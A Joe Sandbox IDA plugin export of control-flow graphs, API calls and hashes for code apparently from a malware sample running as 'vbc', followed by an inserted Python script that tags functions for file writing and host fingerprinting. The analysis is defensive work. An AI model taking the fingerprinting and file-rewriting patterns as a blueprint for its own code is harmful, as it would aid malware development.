                                                                                                                                                                      • Opcode Fuzzy Hash: c7195831ca29befead0414fc1bf3cf152a7fdf075fb9c5b4a6f75413d636c864
                                                                                                                                                                      • Instruction Fuzzy Hash: 72C13974A007099FDB14EF69D890AAEBBF1FF88300F108569E40ADB351DB74A945CF95

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      control_flow_graph 3178 f4e64f-f4e651 3179 f4e6c4 3178->3179 3180 f4e6c7-f4e6d2 3179->3180 3181 f4e6d8 3180->3181 3182 f4e8ea 3180->3182 3181->3182 3185 f4e6de 3181->3185 3183 f4e8f0 3182->3183 3184 f4e5c2-f4e5d8 3182->3184 3183->3184 3186 f4e8f6-f4e906 3183->3186 3187 f4e59e-f4e5b4 SetFilePointerEx 3184->3187 3188 f4e5da 3184->3188 3189 f4e908 3186->3189 3190 f4e5ba 3187->3190 3191 f4e9db-f4e9e0 3187->3191 3192 f4e5e0 3188->3192 3193 f4e852 3188->3193 3197 f4e974-f4e97b 3189->3197 3198 f4e90c 3189->3198 3190->3191 3199 f4e5c0 3190->3199 3195 f4e9e6 3191->3195 3196 f4e71b-f4e8cf 3191->3196 3192->3193 3200 f4e5e6 3192->3200 3193->3187 3194 f4e858-f4e869 3193->3194 3201 f4e796-f4e79f 3194->3201 3202 f4e86f 3194->3202 3195->3196 3203 f4e9ec-f4ea00 3195->3203 3196->3182 3198->3189 3204 f4e90e 3198->3204 3199->3184 3211 f4e7a5 3201->3211 3212 f4e6df 3201->3212 3206 f4e94e 3202->3206 3207 f4ea06-f4ea0b 3203->3207 3208 f4e671-f4e675 3203->3208 3209 f4e914-f4e919 3204->3209 3210 f4e57f-f4e8b4 3204->3210 3206->3201 3213 f4e954-f4e958 3206->3213 3214 f4f595-f4f59c 3207->3214 3220 f4e887-f4e88a 3208->3220 3221 f4e67b 3208->3221 3217 f4e8a3-f4e8b0 3209->3217 3218 f4e91b-f4e920 3209->3218 3248 f4e8b6-f4e8ba 3210->3248 3211->3212 3228 f4e727 3211->3228 3215 f4e9c0-f4e9cb 3212->3215 3216 f4e6ed-f4e705 call f45f10 3212->3216 3213->3180 3234 f4e95e 3213->3234 3230 f4e9d1 3215->3230 3231 f4e7ac-f4e7bc SetFilePointerEx 3215->3231 3236 f4e70a-f4e70f 3216->3236 3226 f4e926 3218->3226 3227 f4e89d 3218->3227 3221->3220 3223 f4e681 3221->3223 3232 f4e5e7 3223->3232 3233 f4e688-f4e692 3223->3233 3226->3227 3237 f4e92c-f4eb95 3226->3237 3227->3217 3235 f4e935-f4e937 3227->3235 3240 f4e590 3228->3240 3241 f4e72d 3228->3241 3230->3231 3243 f4e9d7-f4e9d9 3230->3243 3238 f4e7c2-f4e7c8 3231->3238 3239 f4e648-f4e651 3231->3239 
3232->3248 3249 f4e5ed 3232->3249 3245 f4e964 3234->3245 3246 f4e779-f4e77c 3234->3246 3253 f4e93c 3235->3253 3250 f4e7ce 3238->3250 3251 f4e879 3238->3251 3239->3179 3240->3194 3244 f4e596-f4e59c 3240->3244 3241->3240 3252 f4e733 3241->3252 3243->3191 3244->3187 3245->3246 3261 f4e96a-f4e96d 3245->3261 3256 f4e782 3246->3256 3257 f4e62e-f4e637 3246->3257 3259 f4e8c0 3248->3259 3260 f4e6ae-f4e6c2 3248->3260 3262 f4e5f3 3249->3262 3263 f4e74d 3249->3263 3250->3251 3264 f4e7d4-f4e7e9 3250->3264 3251->3220 3252->3201 3265 f4e735 3252->3265 3253->3203 3266 f4e942 3253->3266 3256->3257 3268 f4e788 3256->3268 3270 f4e822-f4e824 3257->3270 3283 f4e63d 3257->3283 3259->3260 3269 f4e8c6-f4e8ce 3259->3269 3260->3233 3261->3197 3262->3263 3271 f4e5f9-f4e5fb 3262->3271 3263->3246 3267 f4e984-f4e989 3263->3267 3264->3253 3264->3270 3272 f4e5fd-f4e5ff 3265->3272 3273 f4e73b-f4e741 3265->3273 3266->3203 3274 f4e948 3266->3274 3267->3210 3279 f4e98f 3267->3279 3268->3260 3277 f4e78e 3268->3277 3269->3214 3270->3180 3278 f4e82a 3270->3278 3271->3272 3280 f4e601-f4e618 3272->3280 3273->3248 3284 f4e747-f4e74c 3273->3284 3274->3198 3275 f4e94a 3274->3275 3275->3198 3282 f4e94c 3275->3282 3277->3184 3285 f4e794 3277->3285 3278->3280 3286 f4e830-f4e835 3278->3286 3279->3210 3287 f4e995 3279->3287 3282->3206 3283->3270 3288 f4e643-f4e647 3283->3288 3285->3201 3287->3215 3288->3239
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 862a4f9b6626ba9db815b71ea64d41f9ee5be2df1fef5e1423a990a0803da14d
                                                                                                                                                                      • Instruction ID: 7571d3dae737f20b658fb30c74faa3c5c5806138710011aa79954eab0fb33b90
                                                                                                                                                                      • Opcode Fuzzy Hash: 862a4f9b6626ba9db815b71ea64d41f9ee5be2df1fef5e1423a990a0803da14d
                                                                                                                                                                      • Instruction Fuzzy Hash: 00918431D0D3819EDB228F28880477A7FA07F66734F49869EEC958A1D2D7759C08F752

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      control_flow_graph 3289 f67df0-f67dfa 3290 f67e00 3289->3290 3291 f68288-f6829a call f50d80 3289->3291 3290->3291 3293 f67e06-f67e15 GetComputerNameW 3290->3293 3298 f682a0 3291->3298 3299 f6851e-f6852d call f50d80 3291->3299 3294 f682b6-f682bb 3293->3294 3295 f67e1b 3293->3295 3295->3294 3297 f67e21-f67e2d 3295->3297 3298->3299 3301 f682a6 3298->3301 3303 f67dbc-f67dce 3301->3303 3304 f682ac 3301->3304 3311 f67d35 3303->3311 3312 f67d6c-f67d80 GetVolumeInformationW 3303->3312 3307 f682b2-f682b4 3304->3307 3308 f67d20-f67d2b 3304->3308 3307->3294 3309 f67d61-f67d68 3308->3309 3310 f67d2d-f67d94 3308->3310 3315 f67de5-f67dea 3309->3315 3316 f67d6a 3309->3316 3310->3309 3320 f67d96 3310->3320 3311->3312 3314 f67d37-f67d39 3311->3314 3317 f67d3b-f67d46 3314->3317 3318 f67d83-f67d8c GetWindowsDirectoryW 3315->3318 3319 f67dec 3315->3319 3316->3312 3316->3315 3321 f67d97-f67d98 3317->3321 3322 f67d48-f67dac 3317->3322 3318->3317 3324 f67d8e-f67da6 3318->3324 3319->3318 3323 f67dee 3319->3323 3320->3321 3325 f67de2 3321->3325 3326 f67d9a-f67d9f 3321->3326 3322->3321 3330 f67dae-f67db3 3322->3330 3323->3289 3324->3303 3329 f67da8 3324->3329 3329->3303 3331 f67daa-f67dba 3329->3331 3331->3303
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ComputerName
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3545744682-0
                                                                                                                                                                      • Opcode ID: 965e4073ba8491133caa4bffc42209f091d6db640bd5f686c709c5a3297cbf92
                                                                                                                                                                      • Instruction ID: ddee401455ebd6cc6be3753e3680b6136e633cb6be818fad0346b061760998c6
                                                                                                                                                                      • Opcode Fuzzy Hash: 965e4073ba8491133caa4bffc42209f091d6db640bd5f686c709c5a3297cbf92
                                                                                                                                                                      • Instruction Fuzzy Hash: 1F216771E4C3047BEA3577148C06FB53A346F62B7CF884D8AF588551D2D5686C09B263

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      control_flow_graph 3333 f4b665-f4b67f 3334 f4b685 3333->3334 3335 f4b730-f4b73b 3333->3335 3334->3335 3341 f4b5ec-f4b5f1 3334->3341 3337 f4b6e5-f4b6f4 3335->3337 3338 f4b73d 3335->3338 3339 f4b61e-f4b626 3337->3339 3338->3337 3340 f4b73f 3338->3340 3342 f4b62c 3339->3342 3343 f4b4de-f4b4f3 SetFilePointerEx 3339->3343 3344 f4b745 3340->3344 3345 f4b828-f4b839 WriteFile 3340->3345 3341->3339 3342->3343 3346 f4b632-f4b636 3342->3346 3347 f48c1d-f48c25 3344->3347 3348 f4b74b 3344->3348 3349 f4b440-f4b4c0 3346->3349 3350 f4b63c 3346->3350 3351 f48b7b-f48b7f 3347->3351 3352 f48c2b 3347->3352 3353 f48a30-f48a35 3348->3353 3354 f4b751 3348->3354 3350->3349 3356 f4b642-f4b65c 3350->3356 3360 f48c6c-f48c89 3351->3360 3357 f48bb6 3352->3357 3358 f48c2d 3352->3358 3359 f4b764-f4b76e 3354->3359 3366 f4b770-f4b77f ReadFile 3356->3366 3357->3351 3365 f48bb8 3357->3365 3358->3357 3364 f48c2f 3358->3364 3359->3366 3368 f48c35 3364->3368 3369 f489d9-f489e1 3364->3369 3370 f4b781-f4b791 3366->3370 3371 f4b7e9-f4bbb1 3366->3371 3372 f48dc9-f48dd9 3368->3372 3373 f48c3b-f48c53 3368->3373 3374 f489c7-f489d7 call f45d20 3369->3374 3375 f489e3 3369->3375 3370->3359 3421 f4bbb3 3371->3421 3422 f4bbb9-f4bbc8 3371->3422 3376 f48db7-f48dbb 3372->3376 3377 f48ddb 3372->3377 3380 f48ae4-f48aec 3373->3380 3381 f48c59 3373->3381 3374->3369 3375->3374 3382 f489e5-f489ee 3375->3382 3391 f48bd4-f48bdd 3376->3391 3392 f48dc1 3376->3392 3377->3376 3383 f48ddd-f48de1 3377->3383 3389 f48aee-f48af3 3380->3389 3390 f48aaf-f48db6 3380->3390 3381->3380 3387 f48c5f 3381->3387 3394 f489c1 3382->3394 3395 f489ba 3382->3395 3396 f48ce6-f48cfe 3383->3396 3397 f48de7 3383->3397 3387->3360 3392->3391 3393 f48dc7 3392->3393 3393->3372 3394->3395 3401 f489c3-f489c5 3394->3401 3404 f48d00 3396->3404 3405 f48d4b-f48d67 3396->3405 3397->3396 3402 
f48ded-f48dfe 3397->3402 3401->3374 3404->3405 3410 f48d02-f48d0e 3404->3410 3405->3372 3415 f48c8a-f48cb4 3405->3415 3419 f48d10-f48d4a 3410->3419 3420 f48cb9-f48cc8 3410->3420 3415->3420 3420->3405 3421->3422 3425 f4bbb5-f4bbb7 3421->3425 3425->3422
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 1ebc5729437701fd3a3b73dc7d4ac95f04e104fcc543dfa199ccfdfd361d0d84
                                                                                                                                                                      • Instruction ID: 8ff9a81b7e86ac2bd7f07d531083161001b37278aace8234ddae389a73d4bdd3
                                                                                                                                                                      • Opcode Fuzzy Hash: 1ebc5729437701fd3a3b73dc7d4ac95f04e104fcc543dfa199ccfdfd361d0d84
                                                                                                                                                                      • Instruction Fuzzy Hash: 12316731C0D7849EDB228F24885873A7FA4AB95774F08448EEC81861A3C7B8CC09F763
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: D$
                                                                                                                                                                      • API String ID: 0-2582639798
                                                                                                                                                                      • Opcode ID: 5e6ba4a7ba577d0fc7e8e6ed220beb8b9145c2d44f6961a8f25a161d80482199
                                                                                                                                                                      • Instruction ID: 4d00e814b0dbc51c73b683f50c3487cb70b4a056d70491de76bf2fac833bdb48
                                                                                                                                                                      • Opcode Fuzzy Hash: 5e6ba4a7ba577d0fc7e8e6ed220beb8b9145c2d44f6961a8f25a161d80482199
                                                                                                                                                                      • Instruction Fuzzy Hash: 7271C725ECE3C15FDB3646284C157367FA09BA2770F9E42CAEC918A1E2D6998C05F313

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      control_flow_graph 3702 9f1f785-9f1f826 3703 9f1f828-9f1f83a 3702->3703 3704 9f1f83d-9f1f848 3702->3704 3703->3704 3705 9f1f84a-9f1f859 3704->3705 3706 9f1f85c-9f1f8bc 3704->3706 3705->3706 3708 9f1f8c4-9f1f964 CreateWindowExW 3706->3708 3709 9f1f966-9f1f96c 3708->3709 3710 9f1f96d-9f1f9d8 3708->3710 3709->3710 3714 9f1f9e5 3710->3714 3715 9f1f9da-9f1f9dd 3710->3715 3716 9f1f9e6 3714->3716 3715->3714 3716->3716
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 09F1F951
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2755656125.0000000009F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F10000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_9f10000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateWindow
                                                                                                                                                                      • String ID: 0
                                                                                                                                                                      • API String ID: 716092398-4108050209
                                                                                                                                                                      • Opcode ID: be0d4e95cf9c4e61eeed50cfbed5822098a96cbef047e288d08226f6fa513cbc
                                                                                                                                                                      • Instruction ID: 3c03b96b80597220e8e2527aa35fe0711235edac371e716254052a753f61c4ae
                                                                                                                                                                      • Opcode Fuzzy Hash: be0d4e95cf9c4e61eeed50cfbed5822098a96cbef047e288d08226f6fa513cbc
                                                                                                                                                                      • Instruction Fuzzy Hash: FC717AB4D00218DFDF20CFA9D984BDEBBF1BB09314F5491AAE858A7221D7349A85CF44
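The entries above are the text form of the Joe Sandbox IDA plugin's per-function export: a control_flow_graph token stream (a node id, the basic block's address or address range, any API called from that block, "call <addr>" markers for subcalls, and "a->b" edges), followed by the memory dump the function was recovered from. Read together they line up with the Signatures section: the function at 0x00F4B180 positions a file pointer and writes to the file (SetFilePointerEx, WriteFile), the one at 0x00F67DF0 reads the computer name, volume information and Windows directory, the ones at 0x09F1F785 and 0x09F1C564 create a window, and every one of them sits in a dump marked "based on PE: false", that is, memory that is not a mapped image. The following Python is an added triage helper written for this page; it is not code from the Joe Sandbox report or plugin. It parses entries in this shape and tags each function by the API pattern it shows. The sample input is constructed from the entries above, cut down to the nodes that carry API names. Reading the first field of the .sdmp name as the process index and the last token of the snapshot name (vbc) as the process image name is an assumption drawn from the way hcaresult_9_2_f44000_vbc matches the 00000009.00000002 prefix and the 0000000000F44000 field of the source file name; the report does not state it.

```python
"""Triage helper for Joe Sandbox 'Control-flow Graph' function entries.
Added example, not code from the Joe Sandbox report or plugin. Field meanings
the report does not state are marked as assumptions in the comments."""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Constructed sample: three entries copied in shape from the report above and
# cut down to the nodes that carry API names or "call <addr>" markers.
SAMPLE = """\
control_flow_graph 3057 f4b180-f4b18f 3058 f4b2a3 3057->3058 3061 f4b2a7-f4b2c0 SetFilePointerEx 3059->3061 3079 f4b2e0-f4b2ed WriteFile 3077->3079 3084 f4b0d0-f4b0d8 SetFilePointerEx 3081->3084
• Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
• Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
control_flow_graph 3289 f67df0-f67dfa 3291 f68288-f6829a call f50d80 3289->3291 3293 f67e06-f67e15 GetComputerNameW 3290->3293 3312 f67d6c-f67d80 GetVolumeInformationW 3303->3312 3318 f67d83-f67d8c GetWindowsDirectoryW 3315->3318
• Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
• Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
control_flow_graph 3702 9f1f785-9f1f826 3708 9f1f8c4-9f1f964 CreateWindowExW 3706->3708
• Source File: 00000009.00000002.2755656125.0000000009F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F10000, based on PE: false
• Snapshot File: hcaresult_9_2_9f10000_vbc.jbxd
"""

# One basic block: "<node id> <lo>[-<hi>]" followed by zero or more API names
# and "call <addr>" markers. "<a>-><b>" edge tokens never match because the
# node id must be preceded by whitespace and followed by a single space.
NODE_RE = re.compile(
    r"(?<![\w>-])(\d+) ([0-9a-f]+)(?:-([0-9a-f]+))?"
    r"((?: (?!call\b)[A-Za-z_]\w*| call [0-9a-f]+)*)")
SRC_RE = re.compile(
    r"Source File: (\S+)\.sdmp, Offset: ([0-9A-Fa-f]+), based on PE: (true|false)")
SNAP_RE = re.compile(r"Snapshot File: \S*_([A-Za-z0-9]+)\.jbxd")

@dataclass
class FunctionEntry:
    blocks: List[Tuple[int, int]] = field(default_factory=list)  # (lo, hi) per basic block
    apis: List[str] = field(default_factory=list)                # API names in graph order
    subcalls: List[int] = field(default_factory=list)            # targets of "call <addr>"
    dump_pid: Optional[int] = None   # first .sdmp name field, read as process index (assumption)
    dump_base: Optional[int] = None  # "Offset:" value of the dump
    based_on_pe: Optional[bool] = None
    process: Optional[str] = None    # last snapshot-name token, read as image name (assumption)

def parse_entries(text: str) -> List[FunctionEntry]:
    entries: List[FunctionEntry] = []
    cur: Optional[FunctionEntry] = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("control_flow_graph"):
            cur = FunctionEntry()
            entries.append(cur)
            for m in NODE_RE.finditer(line):
                lo = int(m.group(2), 16)
                hi = int(m.group(3), 16) if m.group(3) else lo
                cur.blocks.append((lo, hi))
                toks = iter(m.group(4).split())
                for tok in toks:
                    if tok == "call":
                        cur.subcalls.append(int(next(toks), 16))
                    else:
                        cur.apis.append(tok)
        elif cur is not None:
            src = SRC_RE.search(line)
            snap = SNAP_RE.search(line)
            if src:
                cur.dump_pid = int(src.group(1).split(".")[0])
                cur.dump_base = int(src.group(2), 16)
                cur.based_on_pe = src.group(3) == "true"
            elif snap:
                cur.process = snap.group(1)
    return entries

# API groupings used for tagging. The grouping is this example's own, chosen to
# line up with the report's signatures; it is not a classification Joe Sandbox makes.
FILE_WRITE = {"SetFilePointerEx", "WriteFile"}
HOST_IDENTITY = {"GetComputerNameW", "GetVolumeInformationW", "GetWindowsDirectoryW"}

def classify(entry: FunctionEntry) -> List[str]:
    apis = set(entry.apis)
    tags = []
    if entry.based_on_pe is False:
        tags.append("code-not-backed-by-pe")    # dump is raw memory, not a mapped image
    if FILE_WRITE <= apis:
        tags.append("seeks-and-writes-file")    # positions a file handle, then writes
    if apis & HOST_IDENTITY:
        tags.append("collects-host-identity")   # computer name, volume info, Windows dir
    if "CreateWindowExW" in apis:
        tags.append("creates-window")
    return tags

def summarize(text: str) -> List[Tuple[str, Optional[str], List[str]]]:
    """One (start address, process, tags) row per function entry in the text."""
    return [(f"{(e.blocks[0][0] if e.blocks else 0):08x}", e.process, classify(e))
            for e in parse_entries(text)]

if __name__ == "__main__":
    for start, proc, tags in summarize(SAMPLE):
        print(start, proc, ", ".join(tags))
```

Run as-is it prints one row per sample function. On a full report, feed in the text of the Control-flow Graph sections and filter on the tags: every "seeks-and-writes-file" function that also carries "code-not-backed-by-pe" is where to start when looking for the file infection behaviour the Signatures section reports, and "collects-host-identity" marks the fingerprinting code worth checking for the values it sends out.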

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      control_flow_graph 3717 9f1c564-9f1f826 3719 9f1f828-9f1f83a 3717->3719 3720 9f1f83d-9f1f848 3717->3720 3719->3720 3721 9f1f84a-9f1f859 3720->3721 3722 9f1f85c-9f1f964 CreateWindowExW 3720->3722 3721->3722 3725 9f1f966-9f1f96c 3722->3725 3726 9f1f96d-9f1f9d8 3722->3726 3725->3726 3730 9f1f9e5 3726->3730 3731 9f1f9da-9f1f9dd 3726->3731 3732 9f1f9e6 3730->3732 3731->3730 3732->3732
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 09F1F951
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2755656125.0000000009F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F10000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_9f10000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateWindow
                                                                                                                                                                      • String ID: 0
                                                                                                                                                                      • API String ID: 716092398-4108050209
                                                                                                                                                                      • Opcode ID: 980e40eac9dc50a61207b02a456a0c3160ca6b00dc48fe11b471358331d92796
                                                                                                                                                                      • Instruction ID: f6597cd547ccde964bf714364c4ab31989da19511f26174d0f2f25e478fd39d7
                                                                                                                                                                      • Opcode Fuzzy Hash: 980e40eac9dc50a61207b02a456a0c3160ca6b00dc48fe11b471358331d92796
                                                                                                                                                                      • Instruction Fuzzy Hash: 7C716CB4D00218DFDF20CFA9D984BDEBBF1BB09310F5491AAE818A7221D7719985CF54
APIs
• SetFilePointerEx.KERNELBASE ref: 00F4B08B
Strings
Memory Dump Source
• Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
Similarity
• API ID: FilePointer
• String ID: SWVtvut
• API String ID: 973152223-2559063503
• Opcode ID: 06fa768bc927e25de1c31a72dc0bda8c3b9c12eeec895d0e7fa52c0fd0a7c251
• Instruction ID: 4af16d3db72760c12f4f62e4c68904b0128b845b03aafd76a9a12d9077d0b065
• Opcode Fuzzy Hash: 06fa768bc927e25de1c31a72dc0bda8c3b9c12eeec895d0e7fa52c0fd0a7c251
• Instruction Fuzzy Hash: 40017C72D4E3819FD3258B198854A77BFA49FA2731F09858EE8658B1E3C334CC04A713

Control-flow Graph
(graph rendering; legend: executed / not executed blocks) 26 basic blocks between f4b440 and f4bbc8, first listed at f4b4fe. ReadFile is called from block f4b764-f4b77f and WriteFile from block f4b828-f4b839; block f4b526-f4b52d calls f4be30. A chain of single-instruction blocks (f4b50a, f4b520, f4b533, f4b539, f4b53f, f4b545, f4b54b), most with two successors, precedes them, and one edge leaves the range to f49670 and continues at f4b440-f4b456.
APIs
Memory Dump Source
• Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
Similarity
• API ID: FileRead
• String ID:
• API String ID: 2738559852-0
• Opcode ID: 87889544b43b9dd23c3566f9c78d9bb98b71d6b03eb128aa346efa4cd0db30d9
• Instruction ID: 9ecf0240fc5a44403f04fc827898af3862059df2ccb03a16b620478f3ee55754
• Opcode Fuzzy Hash: 87889544b43b9dd23c3566f9c78d9bb98b71d6b03eb128aa346efa4cd0db30d9
• Instruction Fuzzy Hash: A211A322E0C3456BCF219E648C44A797F78EBE6770F48445AFE80860A3D368CD14F762
APIs
• GetFileSizeEx.KERNEL32(00F8A184,?,?,?,?,?,?,?,?,?,?,?,?,00F8A184,00000000), ref: 00F4D729
• SetFileTime.KERNELBASE ref: 00F4D788
Memory Dump Source
• Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
Similarity
• API ID: File$SizeTime
• String ID:
• API String ID: 3321136615-0
• Opcode ID: 0e9e569d0a8edfdb27f8bb5080da0ea8618d59109ff59b7764d224ebb2e68590
• Instruction ID: 01168d4dc018bfb9834918ec31cd03a30b6caefba3f24351d72cee36a0a6dbf2
• Opcode Fuzzy Hash: 0e9e569d0a8edfdb27f8bb5080da0ea8618d59109ff59b7764d224ebb2e68590
• Instruction Fuzzy Hash: C4112835C0E2409BCB7B8B1998587327FA46BA63B0F1C154BED21831F1D26C9D00F663

Control-flow Graph
(graph rendering; legend: executed / not executed blocks) 10 basic blocks between f44f7c and f45b71, first listed at f45a3b. CreateThread is called from block f45a4b-f45a53 and RtlExitUserThread from block f45a59-f45b6f, which also calls f45d20 (as does block f45054-f4505d); the last block, f45b71, has only an edge back to itself.
APIs
• CreateThread.KERNELBASE(00000000,00000000,00F455C0,?,00000000,00000000), ref: 00F45A51
• RtlExitUserThread.NTDLL(00000000), ref: 00F45B11
Memory Dump Source
• Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
Similarity
• API ID: Thread$CreateExitUser
• String ID:
• API String ID: 4108186749-0
• Opcode ID: c7918b001c9568da7c11481a832244e17d44966ea15a5c83ef512d47d51f9310
• Instruction ID: 985713e0b447643709b3eb36c2edcbcbc77f32d905b32ecc3e9ce422a0501275
• Opcode Fuzzy Hash: c7918b001c9568da7c11481a832244e17d44966ea15a5c83ef512d47d51f9310
• Instruction Fuzzy Hash: B8110815D0DBC24FD722A7784865366BFA05B63B34F1902C6D9908A1E3D2594D4CA3A3
APIs
• SetFilePointerEx.KERNELBASE ref: 00F4BDD4
• ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 00F4C14B
Memory Dump Source
• Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
Similarity
• API ID: File$PointerRead
• String ID:
• API String ID: 3154509469-0
• Opcode ID: 23ff362b96602d9a21a8d8de70b59c0907b74a6c66c28a109bcbdb0e7fb4a305
• Instruction ID: b29172706ed98ae4c0c22ad597cea144d5588898adf1b0a69c7a223138c0c9a8
• Opcode Fuzzy Hash: 23ff362b96602d9a21a8d8de70b59c0907b74a6c66c28a109bcbdb0e7fb4a305
• Instruction Fuzzy Hash: CD115165C0E3815FD7268B28881972A7FB06FA3331F4954CAECC0CA1A3D779C908A752
APIs
Memory Dump Source
• Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
Similarity
• API ID: File$PointerRead
• String ID:
• API String ID: 3154509469-0
• Opcode ID: 13bede36612ec526489937982aa42fbf2fe51175b71f9f160d57e4e405faf7c0
• Instruction ID: 79f014fb4eac75be56ac114dbc9015e14d088bbd7fb993c04839f757a2774902
• Opcode Fuzzy Hash: 13bede36612ec526489937982aa42fbf2fe51175b71f9f160d57e4e405faf7c0
• Instruction Fuzzy Hash: B7018FB1C4D3009ED7256F28840837A7EE0AB51760F4998AAEC4692153DB78C804BB97
APIs
Memory Dump Source
• Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
Similarity
• API ID: File$Pointer$Read
• String ID:
• API String ID: 2010065189-0
• Opcode ID: 5ab3ff3b58f1a1a68045a2a141ef67788c328beb12e56a858597fa5e0cc11591
• Instruction ID: c63d941f215a9e87c56a8cda079fff8d64577d63ff802564532241442742a40f
• Opcode Fuzzy Hash: 5ab3ff3b58f1a1a68045a2a141ef67788c328beb12e56a858597fa5e0cc11591
• Instruction Fuzzy Hash: 09F0AC61C4D3C24FD7162F7C84593667FB0AF12310F5949D6DCC18A053DB68C859EB56

Control-flow Graph
(graph rendering; legend: executed / not executed blocks) 34 graph nodes between 9f1d438 and 9f1d701; the block at 9f1d45e is listed twice, once as a call to 9f1d718 and once as a call to 9f1d708. GetModuleHandleW is called from block 9f1d68d-9f1d6ca; other blocks call 9f1c3ac (9f1d449-9f1d456), 9f1c3b8 (9f1d4f0-9f1d4f7), 9f15a30 (9f1d538-9f1d541), and 9f1c228 and 9f1c3c8 (9f1d55e-9f1d56e).
Memory Dump Source
• Source File: 00000009.00000002.2755656125.0000000009F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_9f10000_vbc.jbxd
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0
• Opcode ID: 1cc071369eedf10d0451d2030adde5f6b9f08dd5f56cf77ee4402668e51f6627
• Instruction ID: 4ef76d90b6fa13c8407cddd2fdcf9236af0e8cba62180ed755c0a7206582935d
• Opcode Fuzzy Hash: 1cc071369eedf10d0451d2030adde5f6b9f08dd5f56cf77ee4402668e51f6627
